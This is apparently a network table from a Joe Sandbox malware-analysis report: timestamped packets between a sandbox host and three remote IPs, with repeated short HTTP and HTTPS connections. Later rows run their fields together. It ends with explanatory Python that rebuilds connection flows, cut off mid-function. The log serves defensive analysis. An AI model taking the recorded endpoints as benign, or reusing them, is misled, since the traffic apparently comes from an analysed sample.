Sep 9, 2024 08:54:57.184673071 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.184679031 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.184741020 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.185516119 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.185535908 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.185621977 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.185627937 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.185679913 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.199737072 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.199767113 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.199919939 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.199925900 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.200108051 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.200593948 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.200611115 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.200683117 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.200689077 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.200726986 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.201773882 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.201817036 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.201852083 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.201857090 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.201888084 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.201931000 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.213941097 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.213970900 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.214109898 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.214118004 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.214169025 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.275540113 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.275567055 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.275732994 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.275743008 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.275795937 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.276261091 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.276274920 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.276369095 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.276375055 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.276437998 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.277009964 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.277023077 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.277091026 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.277097940 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.277148962 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.291604042 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.291616917 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.291697979 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.291702986 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.291810036 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.292253017 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.292267084 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.292335033 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.292340040 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.292390108 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.293162107 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.293179989 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.293875933 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.293904066 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.294019938 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.294028044 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.305994987 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.306011915 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.306112051 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.306124926 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.360805035 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.366223097 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366245985 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366297960 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.366303921 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366318941 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.366355896 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.366569996 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366585970 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366658926 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.366664886 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.366715908 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.367578983 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.367594004 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.367650032 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.367654085 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.367691994 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.367691994 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.384076118 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384092093 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384136915 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.384143114 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384162903 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.384190083 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.384773016 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384788036 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384850025 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.384855986 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.384932995 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
Sep 9, 2024 08:54:57.385535955 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.385550976 CEST | 443 | 49710 | 135.181.160.46 | 192.168.2.6
Sep 9, 2024 08:54:57.385648966 CEST | 49710 | 443 | 192.168.2.6 | 135.181.160.46
                                        Sep 9, 2024 08:54:57.385653973 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.385720015 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.386181116 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.386195898 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.386259079 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.386265993 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.386310101 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.397192955 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.397219896 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.397277117 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.397285938 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.397335052 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.458705902 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.458729982 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.458842993 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.458854914 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.458904982 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.458992004 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459007978 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459080935 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.459088087 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459187984 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.459681988 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459723949 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459768057 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.459773064 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.459803104 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.459830046 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.477905035 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.477929115 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.478015900 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.478022099 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.478077888 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.478719950 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.478741884 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.478797913 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.478804111 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.478856087 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.479357004 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.479372978 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.479428053 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.479434013 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.479479074 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.480015993 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.480030060 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.480074883 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.480078936 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.480107069 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.480124950 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.490957975 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.490972042 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.491035938 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.491040945 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.491091013 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553639889 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553662062 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553730965 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553740978 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553766012 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553781033 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553781033 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553787947 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553797960 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553823948 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553868055 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.553868055 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:57.553910017 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:57.563776016 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:55:08.622186899 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:08.627079010 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:08.627141953 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:08.627346992 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:08.632149935 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:14.479773045 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:14.484637976 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:14.489500999 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:16.208054066 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:16.251451969 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:16.257600069 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.257635117 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.257859945 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.262526989 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.262541056 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.736151934 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.736227036 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.740923882 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.740936995 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.741333008 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.782702923 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.793402910 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.836507082 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.898658037 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.898792028 CEST44349718188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:16.898951054 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.904515028 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.907978058 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:16.913168907 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.202359915 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.205106974 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205158949 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.205246925 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205569029 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205579996 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.251451015 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.666810989 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.668876886 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.668908119 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814291000 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814393044 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814450026 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.814990997 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.819384098 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.824527025 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.824604988 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.830879927 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.835700035 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.835786104 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.847739935 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.852525949 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:18.599803925 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:18.601231098 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601277113 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.601346970 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601608992 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601622105 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.642108917 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.075015068 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.076679945 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.076699018 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218861103 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218976974 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.219048977 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.219679117 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.223922014 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.225599051 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.228890896 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.228972912 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.230420113 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.230499029 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.232568026 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.237287045 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.121956110 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.123646975 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.123694897 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.123765945 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124095917 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124114990 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.173446894 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.579633951 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.581279039 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.581298113 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713253975 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713342905 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713392973 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.713865995 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.716948986 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.718267918 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.722095013 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.722168922 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723037004 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.723129034 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723191023 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.727931976 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.497507095 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.499212027 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499255896 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.499324083 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499625921 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499638081 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.548357010 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:23.975264072 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.976938009 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.976957083 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112828016 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112929106 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112987995 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.113500118 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.117928982 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.122826099 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:24.122936010 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.123039961 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.128107071 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.702794075 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.704144955 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704178095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.704245090 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704500914 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704516888 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.751498938 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.167380095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.169081926 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.169101000 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308089972 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308163881 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308212996 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.309263945 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.313462019 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.314685106 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319525957 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319572926 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319619894 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319683075 CEST4972980
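The per-packet listing above is what the sandbox exports; what an analyst usually wants from it is the connection view: which remote endpoints the sample talked to, who initiated, how many packets each way, and which destinations were hit by repeated short connections. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security. It reads rows in the table's field order (timestamp, source port, destination port, source IP, destination IP) as whitespace-separated columns, rebuilds bidirectional flows and flags destinations contacted by several separate connections. The embedded sample rows are a constructed subset of the rows in this table; the "first packet seen for a port pair marks the client" rule is an assumption, because the table carries no TCP flags.

```python
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: a subset of rows from the report's network table, in its
# field order (timestamp, source port, dest port, source IP, dest IP), laid out
# as whitespace-separated columns. The values are copied from the table; the
# selection is ours and is not the complete capture.
SAMPLE_ROWS = """\
Sep 9, 2024 08:54:57.294019938 CEST  49710  443    192.168.2.6     135.181.160.46
Sep 9, 2024 08:54:57.294028044 CEST  443    49710  135.181.160.46  192.168.2.6
Sep 9, 2024 08:54:57.563776016 CEST  49710  443    192.168.2.6     135.181.160.46
Sep 9, 2024 08:55:08.622186899 CEST  49713  80     192.168.2.6     132.226.8.169
Sep 9, 2024 08:55:08.627079010 CEST  80     49713  132.226.8.169   192.168.2.6
Sep 9, 2024 08:55:16.257600069 CEST  49718  443    192.168.2.6     188.114.96.3
Sep 9, 2024 08:55:16.257635117 CEST  443    49718  188.114.96.3    192.168.2.6
Sep 9, 2024 08:55:17.824604988 CEST  49713  80     192.168.2.6     132.226.8.169
Sep 9, 2024 08:55:17.830879927 CEST  49720  80     192.168.2.6     132.226.8.169
Sep 9, 2024 08:55:17.835700035 CEST  80     49720  132.226.8.169   192.168.2.6
Sep 9, 2024 08:55:19.228972912 CEST  49720  80     192.168.2.6     132.226.8.169
"""

ROW_RE = re.compile(
    r"^\s*(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+"
    r"\s+(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<sip>[\d.]+)\s+(?P<dip>[\d.]+)\s*$"
)
EPOCH = datetime(1970, 1, 1)


def parse_row(line):
    """Return (seconds, (src_ip, src_port), (dst_ip, dst_port)), or None for a non-row line."""
    m = ROW_RE.match(line)
    if not m:
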